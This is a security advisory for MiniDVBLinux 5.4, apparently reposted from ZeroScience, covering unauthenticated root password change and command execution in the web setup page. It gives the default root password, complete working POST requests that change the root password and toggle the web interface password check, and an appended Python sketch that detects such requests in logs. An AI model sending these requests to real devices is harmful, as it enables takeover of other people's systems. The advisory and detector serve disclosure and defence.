MiniDVBLinux 5.4 Change Root Password

2022.10.17
Credit: LiquidWorm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

MiniDVBLinux 5.4 Change Root Password PoC


Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.

Desc: The application allows a remote attacker to change the root
password of the system without authentication (disabled by default)
and without verification of the previously assigned credential.
Command execution is also possible using several POST parameters.

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5715
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php


24.09.2022

--


Default root password: mld500

Change system password:
-----------------------

POST /?site=setup&section=System HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 778
Content-Type: application/x-www-form-urlencoded
Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba
Host: ip:8008
Origin: http://ip:8008
Referer: http://ip:8008/?site=setup&section=System
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
sec-gpc: 1

APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+


Pretty post data:

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD: r00t
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Kumanovo
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: SYSTEM_PASSWORD


Enable webif password check:
-----------------------------

POST /?site=setup&section=System HTTP/1.1

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
WEBIF_PASSWORD_CHECK: 1
action: save
params:
changed: WEBIF_PASSWORD_CHECK


Disable webif password check:
-----------------------------

POST /?site=setup&section=System HTTP/1.1

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: WEBIF_PASSWORD_CHECK
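
Detection sketch for the requests shown above (an added example, not part of the original advisory or of MiniDVBLinux): it reviews a logged POST to the setup page and flags a root password change, a toggle of the webif password check, and any *_command parameter whose value differs from the ones seen in this advisory. It assumes a proxy or capture that records request bodies; the function name and sample bodies are constructed for illustration.

```python
from urllib.parse import parse_qsl, urlsplit

# *_command values exactly as they appear in the requests in this advisory.
# Assumption: these are the values the stock setup form submits.
EXPECTED_COMMANDS = {
    "APT_PACKAGE_CLASS_command": "/etc/setup/apt.sh setclass",
    "SYSTEM_VERSION_command": "/etc/setup/base.sh setversion",
    "SYSTEM_PASSWORD_command": "/etc/setup/base.sh setpassword",
    "BUSYBOX_ACPI_command": "/etc/setup/busybox.sh setAcpi",
    "BUSYBOX_NTPD_command": "/etc/setup/busybox.sh setNtpd",
    "SYSLOG_SIZE_command": "/etc/setup/init.sh setsyslog",
    "LANG_command": "/etc/setup/locales.sh setlang",
    "TIMEZONE_command": "/etc/setup/locales.sh settimezone",
    "KEYMAP_command": "/etc/setup/locales.sh setkeymap",
}

# Constructed sample request bodies (shortened; not captured traffic).
SAMPLES = {
    "password": "SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword"
                "&SYSTEM_PASSWORD=example&action=save&params=&changed=SYSTEM_PASSWORD+",
    "webif_off": "LOG_LEVEL=1&action=save&params=&changed=WEBIF_PASSWORD_CHECK",
    "tampered": "TIMEZONE_command=%2Fpath%2Fnot%2Fin%2Fform&TIMEZONE=Europe%2FBerlin"
                "&action=save&params=&changed=TIMEZONE",
}


def review_setup_post(method, target, body):
    """Return findings for one logged request to the MLD web setup page."""
    query = dict(parse_qsl(urlsplit(target).query))
    if method.upper() != "POST" or query.get("site") != "setup":
        return []
    form = dict(parse_qsl(body, keep_blank_values=True))
    changed = set(form.get("changed", "").split())
    findings = []
    if "SYSTEM_PASSWORD" in changed:
        findings.append("root password change requested")
    if "WEBIF_PASSWORD_CHECK" in changed:
        # The "disable" request in the advisory omits the field entirely.
        state = "enabled" if form.get("WEBIF_PASSWORD_CHECK") == "1" else "disabled"
        findings.append(f"web interface password check {state}")
    for name, value in form.items():
        if name.endswith("_command") and EXPECTED_COMMANDS.get(name) != value:
            findings.append(f"unexpected {name} value: {value!r}")
    return findings


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, review_setup_post("POST", "/?site=setup&section=System", body))
```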


Copyright 2022, cxsecurity.com